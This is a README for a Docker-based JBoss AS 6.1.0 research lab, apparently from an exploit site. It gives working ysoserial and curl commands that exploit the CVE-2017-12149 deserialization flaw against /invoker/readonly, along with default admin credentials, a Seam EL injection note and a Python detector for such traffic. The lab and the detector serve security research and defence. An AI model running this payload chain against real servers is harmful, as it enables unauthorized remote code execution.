## https://sploitus.com/exploit?id=A5248B53-BEE2-5BBA-B168-827C0C64F360
Many critical industries (banking, healthcare, and manufacturing) rely on legacy middleware that was built to run specifically on JBoss 5 or 6. Because these applications are often too fragile to migrate to modern versions of WildFly (the successor to JBoss), organizations choose to "air-gap" or hide them behind VPNs rather than patching them. When those perimeter defenses fail, the vulnerability is still sitting there, live and unpatched.
# JBoss AS 6.1.0 Vulnerability Research Lab
This repository provides a containerized JBoss Application Server 6.1.0 environment specifically configured for security research and vulnerability verification. It is designed to demonstrate Java Deserialization and JBoss Seam EL Injection flaws.
---
## Quick Start
### 1. Build and Launch
To ensure the custom credentials and configurations are correctly applied, build the container from scratch:
```bash
docker-compose build --no-cache
docker-compose up -d
```
### 2. Access the Environment
- JBoss Console: http://localhost:8080/admin-console/
- Username: `admin`
- Password: `admin`

## Verified Vulnerabilities
#### 1. Java Deserialization (CVE-2017-12149)
The most reliable exploit path in this environment is through the HTTPServerILServlet located at /invoker/readonly.
Verification Steps:

1. Generate a payload using ysoserial to create a file in /tmp:
```bash
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser
```
2. Send the binary payload via curl:
```bash
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly
```
3. Confirm the exploit worked:
```bash
docker exec -it jboss-vulnerability-lab ls /tmp/pwned
```
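A defender-side check for the traffic the verification steps above generate, as an added example that is not part of this repository: it flags request bodies sent under /invoker/ that begin with the Java serialization stream header (0xACED 0x0005) and reports the outermost class name for triage. The function names and the sample requests are constructed for illustration.

```python
import struct

STREAM_MAGIC, STREAM_VERSION = 0xACED, 0x0005  # java.io.ObjectStreamConstants
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72


def first_class_name(body: bytes):
    """None if body is not a Java object stream; otherwise the outermost
    class name, or "" when the stream does not open with a plain object."""
    if len(body) < 4 or struct.unpack(">HH", body[:4]) != (STREAM_MAGIC, STREAM_VERSION):
        return None
    # A plain object begins: TC_OBJECT, TC_CLASSDESC, u2 name length, UTF-8 name.
    if len(body) < 8 or body[4] != TC_OBJECT or body[5] != TC_CLASSDESC:
        return ""
    (length,) = struct.unpack(">H", body[6:8])
    name = body[8:8 + length]
    return name.decode("utf-8", "replace") if len(name) == length else ""


def inspect_request(method: str, path: str, body: bytes):
    """Return an alert dict for a serialized object sent under /invoker/, else None."""
    target = path.split("?", 1)[0]
    if not target.startswith("/invoker/"):
        return None
    cls = first_class_name(body)
    if cls is None:
        return None
    return {"method": method.upper(), "path": target, "bytes": len(body),
            "outer_class": cls or "<unparsed>"}


def _sample_stream(class_name: str) -> bytes:
    """Constructed test input: stream header plus one class descriptor name."""
    name = class_name.encode()
    head = struct.pack(">HHBBH", STREAM_MAGIC, STREAM_VERSION, TC_OBJECT, TC_CLASSDESC, len(name))
    return head + name + b"\x00" * 8  # zeroed serialVersionUID, no object data


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", "/invoker/readonly", _sample_stream("java.util.HashSet")),
    ("POST", "/invoker/readonly", b"name=value"),
    ("POST", "/admin-console/login.seam", _sample_stream("java.util.HashSet")),
    ("post", "/invoker/readonly?x=1", b"\xac\xed\x00\x05\x77\x01\x00"),
]

if __name__ == "__main__":
    for request in SAMPLES:
        print(request[1], "->", inspect_request(*request))
```

JBoss's own HTTP invoker clients also send serialized objects to paths under /invoker/, so the reported class name is triage context rather than a verdict.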
#### 2. JBoss Seam EL Injection (CVE-2010-1871)
The Admin Console is powered by the JBoss Seam framework.
- Endpoint: `/admin-console/login.seam`
- Parameter: `actionOutcome`
- Current Status: Under Research. Standard payloads trigger a 302 Redirect to error.seam, indicating the Seam engine is processing input but potentially filtering specific characters.
## Security Disclaimer
This environment is intentionally vulnerable. It contains unpatched, end-of-life software.
- DO NOT deploy this on a public-facing server.
- DO NOT use these tools on systems you do not have explicit permission to test.

Developed for educational purposes and security research.
Dependencies: [https://github.com/frohoff/ysoserial](https://github.com/frohoff/ysoserial)